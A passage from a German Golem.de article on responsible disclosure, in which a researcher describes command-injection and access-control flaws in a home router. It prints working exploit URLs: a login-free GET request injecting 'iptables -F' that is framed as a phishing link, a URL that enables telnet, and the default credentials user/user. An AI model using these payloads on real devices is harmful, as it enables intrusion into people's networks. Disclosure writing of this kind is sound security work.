Wie ein Angriffsszenario entsteht

Normalerweise teste ich Command-Injections, indem ich einen Ping an mich selbst schicke (Blind Command Injection) aber bei einem Ping-Feld ist das nicht zielführend, da zum einen ohnehin ein Ping ausgeführt wird und zum anderen eine Ausgabe stattfindet, in der das Ergebnis angezeigt wird. Also entscheide ich mich für ein 127.0.0.1;whoami.

Stellenmarkt
  1. Professional IT Service Mitarbeiter (m/w/d)
    Applied Security GmbH, Großwallstadt, Home-Office
  2. SAP Modulbetreuer (m/w/d) für SAP VC/PP
    Sedus Systems GmbH, Geseke (Home-Office möglich)
Detailsuche

Die erste Annahme ist, dass der Befehl wie folgt aufgebaut ist: ping -t 4 -I $wanif $IpAddr und dementsprechend ping -t 4 -I nas0_0 127.0.0.1;whoami ausgeführt wird. Nachdem ich den Request ausgeführt habe, muss ich aber feststellen, dass der Ausgabe-Request Fehler zurückgibt.

Annahme zwei: ping -t 4 $IpAddr -I $wanif, wobei der Parameter wanif manipuliert wird zu nas0_0;whoami respektive ping -t 4 127.0.0.1 -I nas0_0;whoami - und siehe da: root!

Das allein ist schon eine problematische Sicherheitslücke, aber man muss auf dem Gerät angemeldet sein, um sie zu nutzen, und das erschwert das Ausnutzen deutlich.

Golem Karrierewelt
  1. Linux-Shellprogrammierung: virtueller Vier-Tage-Workshop
    04.-07.07.2022, Virtuell
  2. Microsoft Azure Administration: virtueller Zwei-Tage-Workshop
    22./23.08.2022, virtuell
Weitere IT-Trainings

Vielleicht lässt sich der POST-Request, bei dem ein Cookie mit der Session-Id übergeben werden muss, auch als GET-Request übergeben? Ja, das geht. Aber braucht man dann noch die Prüfsumme, die da heißt postSecurityFlag? Nein! Muss man dafür eingeloggt sein? Nein!

Ein Angriffsszenario könnte also wie folgt aussehen: Schicke jemandem, von dem du weißt, er hat ein solches Gerät, eine E-Mail mit dem Link

  1. <a href="https://192.168.1.1/boaform/formPingCs?IpAddr=127.0.0.1&wanif=nas0_0;iptables%20-F;ping 123.123.123.123">Hier klicken für 1.000.000 Euro</a>

und bringe ihn dazu, den Link anzuklicken. Schneide ich unter 123.123.123.123 den Netzwerkverkehr mittels tcpdump mit, kenne ich die IP und mit dem über die Command-Injection eingeschleusten iptables -F habe ich das Gerät für die Außenwelt komplett geöffnet. Einige Browser unterbinden das Aufrufen privater IP-Adressen, wenn die Redirect-Adresse öffentlich ist. Aber das ist leider nicht immer der Fall.

Hacking & Security: Das umfassende Handbuch. 2. aktualisierte Auflage des IT-Standardwerks (Deutsch) Gebundene Ausgabe

Etwas erweitert lässt sich damit auch ein User anlegen, Telnet aktivieren, eine Reverse-Shell initialisieren und so weiter. Apropos Telnet: Wenn man sich im selben Netzwerk befindet und sich das obige Social Engineering sparen möchte, kann man folgenden Link aufrufen:

https://192.168.1.1/boaform/formACL_cisco_base?aclcap=0&apply=apply&updateACL=updateACL&interface=1&LocalLanAccess=3&w_web=0&w_https=0&w_icmp=0&enable=1&aclstartIP=0.0.0.0&aclendIP=0.0.0.0&telnet_open=1

Das ist die zweite Lücke, die ich gefunden habe, als ich im Webinterface Telnet aktivieren wollte, was standardmäßig deaktiviert ist. Der Aufruf aktiviert Telnet, und man muss kein Hacker sein, um auf den Account user mit dem Passwort user zu kommen, der für die Telnet-Anmeldung ausreicht. Aber das wird doch kein administrativer Account sein? Doch!

Bitte aktivieren Sie Javascript.
Oder nutzen Sie das Golem-pur-Angebot
und lesen Golem.de
  • ohne Werbung
  • mit ausgeschaltetem Javascript
  • mit RSS-Volltext-Feed
 Responsible Disclosure: Vom Finden und Melden von SicherheitslückenDas darf keinem Hersteller passieren 
  1.  
  2. 1
  3. 2
  4. 3
  5.  


Jeson 02. Feb 2022

Responsible Disclosure bedeutet ja vor allem, dass man den Hersteller vorab informiert...

KlugKacka 01. Feb 2022

LOL. "Auch große Hersteller wie Cisco sind davor nicht gefeit und müssen sich...

Winetou_Koslowski 25. Jan 2022

Danke!

AllDayPiano 25. Jan 2022

Schlamperei halt.



Aktuell auf der Startseite von Golem.de
Cloud Cam
Amazon macht eigene Überwachungskamera unbrauchbar

Eine fünf Jahre alte Überwachungskamera wird noch dieses Jahr von Amazon außer Betrieb genommen. Kunden erhalten Ersatz, der vielen aber nichts nützt.

Cloud Cam: Amazon macht eigene Überwachungskamera unbrauchbar
Artikel
  1. 30 Jahre Alone in the Dark: Als der Horror filmreif wurde
    30 Jahre Alone in the Dark
    Als der Horror filmreif wurde

    Alone in the Dark feiert Geburtstag. Das Horrorspiel war ein Meilenstein bei der filmreifen Inszenierung von Games. Wie spielt es sich heute?
    Von Andreas Altenheimer

  2. Deutsche Telekom: Spezieller Smartphone-Tarif für Flüchtlinge aus der Ukraine
    Deutsche Telekom
    Spezieller Smartphone-Tarif für Flüchtlinge aus der Ukraine

    Wenn Flüchtlinge aus der Ukraine eine kostenlose SIM-Karte der Deutschen Telekom nutzen, können sie bald in den neuen Tarif wechseln.

  3. Update-Installation dauert: Störungen bei Kartenzahlungen im Einzelhandel bleiben
    Update-Installation dauert
    Störungen bei Kartenzahlungen im Einzelhandel bleiben

    Es gibt ein Update, um die Zahlungsstörungen mit Giro- oder Kreditkarte zu beseitigen. Die Verteilung des Updates braucht aber noch Zeit.

Du willst dich mit Golem.de beruflich verändern oder weiterbilden?
Zum Stellenmarkt
Zur Akademie
Zum Coaching
  • Schnäppchen, Rabatte und Top-Angebote
    Die besten Deals des Tages
    Daily Deals • Alternate (ASUS VG30VQL1A QHD/200 Hz 329€ statt 399,90€ im Vergleich) • Apple iPhone 12 128 GB 669€ statt 699€ im Vergleich• Prime Video: Filme leihen für 0,99€ • Gigabyte RTX 3080 12 GB ab 1.024€ • Mindstar (u. a. MSI MPG X570 Gaming Plus 119€ statt 158,90€ im Vergleich) [Werbung]
    •  /